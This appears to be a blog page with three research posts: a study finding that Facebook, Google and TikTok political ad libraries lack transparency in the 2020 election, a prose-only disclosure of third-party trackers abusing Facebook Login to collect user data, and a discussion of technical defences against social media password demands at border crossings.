September 26, 2022

New Study Analyzing Political Advertising on Facebook, Google, and TikTok

By Orestis Papakyriakopoulos, Christelle Tessono, Arvind Narayanan, Mihir Kshirsagar

With the 2022 midterm elections in the United States fast approaching, political campaigns are poised to spend heavily to influence prospective voters through digital advertising. Online platforms such as Facebook, Google, and TikTok will play an important role in distributing that content. But our new study – How Algorithms Shape the Distribution of Political Advertising: Case Studies of Facebook, Google, and TikTok — that will appear in the Artificial Intelligence, Ethics, and Society conference in August, shows that the platforms’ tools for voluntary disclosures about political ads do not provide the necessary transparency the public needs. More details can also be found on our website: campaigndisclosures.princeton.edu.

Our paper conducts the first large-scale analysis of public data from the 2020 presidential election cycle to critically evaluate how online platforms affect the distribution of political advertisements. We analyzed a dataset containing over 800,000 ads about the 2020 U.S. presidential election that ran in the 2 months prior to the election, which we obtained from the ad libraries of Facebook and Google that were created by the companies to offer more transparency about political ads. We also collected and analyzed 2.5 million TikTok videos from the same time period. These ad libraries were created by the platforms in an attempt to stave off potential regulation such as the Honest Ads Act, which sought to impose greater transparency requirements for platforms carrying political ads. But our study shows that these ad libraries fall woefully short of their own objectives to be more transparent about who pays for the ads and who sees the ads, as well the objectives of bringing greater transparency about the role of online platforms in shaping the distribution of political advertising. 

We developed a three-part evaluative framework to assess the platform disclosures: 

1. Do the disclosures meet the platforms’ self-described objective of making political advertisers accountable?

2. How do the platforms’ disclosures compare against what the law requires for radio and television broadcasters?

3. Do the platforms disclose all that they know about the ad targeting criteria, the audience for the ads, and how their algorithms distribute or moderate content?

Our analysis shows that the ad libraries do not meet any of the objectives. First, the ad libraries only have partial disclosures of audience characteristics and targeting parameters of placed political ads. But these disclosures do not allow us to understand how political advertisers reached prospective voters. For example, we compared ads in the ad libraries that were shown to different audiences with dummy ads that we created on the platforms (Figure 1). In many cases, we measured a significant difference between the calculated cost-per-impression between the two types of ads, which we could not explain with the available data.

  • Figure 1. We plot the generated cost per impression of ads in the ad-libraries that were (1) targeted to all genders & ages on Google, (2) to Females, between 25-34 on YouTube, (3) were seen by all genders & ages in the US on Facebook, and (4) only by females of all ages located in California on Facebook.  For Facebook, lower & upper bounds are provided for the impressions. For Google, lower & upper bounds are provided for cost & impressions, given the extensive “bucketing” of the parameters performed by the ad libraries when reporting them, which are denoted in the figures with boxes. Points represent the median value of the boxes. We compare the generated cost-per impression of ads with the cost-per impression of a set of dummy ads we placed on the platforms with the exact same targeting parameters & audience characteristics. Black lines represent the upper and lower boundaries of an ad’s cost-per-impression as we extracted them from the dummy ads. We label an ad placement as “plausible targeting”, when the ad cost-per-impression overlaps with the one we calculated, denoting that we can assume that the ad library provides all relevant targeting parameters/audience characteristics about an ad.  Similarly, an placement labeled as `”unexplainable targeting’”  represents an ad whose cost-per-impression is outside the upper and lower reach values that we calculated, meaning that potentially platforms do not disclose full information about the distribution of the ad.

Second, broadcasters are required to offer advertising space at the same price to political advertisers as they do to commercial advertisers. But we find that the platforms charged campaigns different prices for distributing ads. For example, on average, the Trump campaign on Facebook paid more per impression (~18 impressions/dollar) compared to the Biden campaign (~27 impressions/dollar). On Google, the Biden campaign paid more per impression compared to the Trump campaign. Unfortunately, while we attempted to control for factors that might account for different prices for different audiences, the data does not allow us to probe the precise reason for the differential pricing. 

Third, the platforms do not disclose the detailed information about the audience characteristics that they make available to advertisers. They also do not explain how the algorithms distribute or moderate the ads. For example, we see that campaigns placed ads on Facebook that were not ostensibly targeted by age, but the ad was not distributed uniformly.  We also find that platforms applied their ad moderation policies inconsistently, with some instances of moderated ads being removed and some others not, and without any explanation for the decision to remove an ad. (Figure 2) 

  • Figure 2. Comparison of different instances of moderated ads across platforms. The light blue bars show how many instances of a single ad were moderated, and maroon bars show how many instances of the same ad were not. Results suggests an inconsistent moderation of content across platforms, with some instances of the same ad being removed and some others not.

Finally, we observed new forms of political advertising that are not captured in the ad libraries. Specifically, campaigns appear to have used influencers to promote their messages without adequate disclosure. For example, on TikTok, we document how political influencers, who were often linked with PACs, generated billions of impressions from their political content. This new type of campaigning still remains unregulated and little is known about the practices and relations between influencers and political campaigns.  

In short, the online platform self-regulatory disclosures are inadequate and we need more comprehensive disclosures from platforms to understand their role in the political process. Our key recommendations include:

– Requiring that each political entity registered with the FEC use a single, universal identifier for campaign spending across platforms to allow the public to track their activity.

– Developing a cross-platform data repository, hosted and maintained by a government or independent entity, that collects political ads, their targeting criteria, and the audience characteristics that received them. 

– Requiring platforms to disclose information that will allow the public to understand how the algorithms distribute content and how platforms price the distribution of political ads. 

– Developing a comprehensive definition of political advertising that includes influencers and other forms of paid promotional activity.

No boundaries for Facebook data: third-party trackers abuse Facebook Login

by Steven Englehardt [0], Gunes Acar, and Arvind Narayanan

So far in the No boundaries series, we’ve uncovered how web trackers exfiltrate identifying information from web pages, browser password managers, and form inputs.

Today we report yet another type of surreptitious data collection by third-party scripts that we discovered: the exfiltration of personal identifiers from websites through “login with Facebook” and other such social login APIs. Specifically, we found two types of vulnerabilities [1]:

  • seven third parties abuse websites’ access to Facebook user data
  • one third party uses its own Facebook “application” to track users around the web.

 

Vulnerability 1: Third parties piggyback on Facebook access granted to websites

Diagram of third-party script accessing Facebook API

When a user clicks “Login with Facebook”, they will be prompted to allow the website they’re visiting to access some of their Facebook profile information [2]. Even after Facebook’s recent moves to lock down the feature, websites can request the user’s email address and  “public profile” (name, age range, gender, locale, and profile photo) without triggering a manual review by Facebook. Once the user allows access, any third-party Javascript embedded in the page, such as tracker.com in the figure above, can also retrieve the user’s Facebook information as if they were the first party [3].

[Read more…]

Engineering around social media border searches

The latest news is that the U.S. Department of Homeland Security is considering a requirement, while passing through a border checkpoint, to inspect a prospective visitor’s “online presence”. That means immigration officials would require users to divulge their passwords to Facebook and other such services, which the agent might then inspect, right there, at the border crossing. This raises a variety of concerns, from its chilling impact on freedom of speech to its being an unreasonable search or seizure, nevermind whether an airport border agent has the necessary training to make such judgments, much less the time to do it while hundreds of people are waiting in line to get through.

Rather than conduct a serious legal analysis, however, I want to talk about technical countermeasures. What might Facebook or other such services do to help defend their users as they pass a border crossing?

Fake accounts. It’s certainly feasible today to create multiple accounts for yourself, giving up the password to a fake account rather than your real account. Most users would find this unnecessarily cumbersome, and the last thing Facebook or anybody else wants is to have a bunch of fake accounts running around. It’s already a concern when somebody tries to borrow a real person’s identity to create a fake account and “friend” their actual friends.

Duress passwords. Years ago, my home alarm system had the option to have two separate PINs. One of them would disable the alarm as normal. The other would sound a silent alarm, summoning the police immediately while making it seem like I disabled the alarm. Let’s say Facebook supported something similar. You enter the duress password, then Facebook locks out your account or switches to your fake account, as above.

Temporary lockouts. If you know you’re about to go through a border crossing, you could give a duress password, as above, or you could arrange an account lockout in advance. You might, for example, designate ten trusted friends, where any five must declare that the lockout is over. Absent those declarations, your account would remain locked, and there would be no means for you to be coerced into giving access to your own account.

Temporary sanitization. Absent any action from Facebook, the best advice today for somebody about to go through a border crossing is to sanitize their account before going through. That means attempting to second-guess what border agents are looking for and delete it in advance. Facebook might assist this by providing search features to allow users to temporarily drop friends, temporarily delete comments or posts with keywords in them, etc. As with the temporary lockouts, temporary sanitization would need to have a restoration process that could be delegated to trusted friends. Once you give the all-clear, everything comes back again.

User defense in bulk. Every time a user, going through a border crossing, exercises a duress password, that’s an unambiguous signal to Facebook. Even absent such signals, Facebook would observe highly unusual login behavior coming from those specific browsers and IP addresses. Facebook could simply deny access to its services from government IP address blocks. While it’s entirely possible for the government to circumvent this, whether using Tor or whatever else, there’s no reason that Facebook needs to be complicit in the process.

So is there a reasonable alternative?

While it’s technically feasible for the government to require that Facebook give it full “backdoor” access to each and every account so it can render threat judgments in advance, this would constitute the most unreasonable search and seizure in the history of that phrase. Furthermore, if and when it became common knowledge that such unreasonable seizures were commonplace, that would be the end of the company. Facebook users have an expectation of privacy and will switch to other services if Facebook cannot protect them.

Wouldn’t it be nice if there was some less invasive way to support the government’s desire for “extreme vetting”? Can we protect ordinary users’ privacy while still enabling the government to intercept people who intend harm to our country? We certainly must assume that an actual bona fide terrorist is going to have no trouble creating a completely clean online persona to use while crossing a border. They can invent wholesome friends with healthy children sharing silly videos of cute kittens. While we don’t know too much about our existing vetting strategies to distinguish tourists from terrorists, we have to assume that the process involves the accumulation of signals and human intelligence, and other painstaking efforts by professional investigators to protect our country from harm. It’s entirely possible that they’re already doing a good job.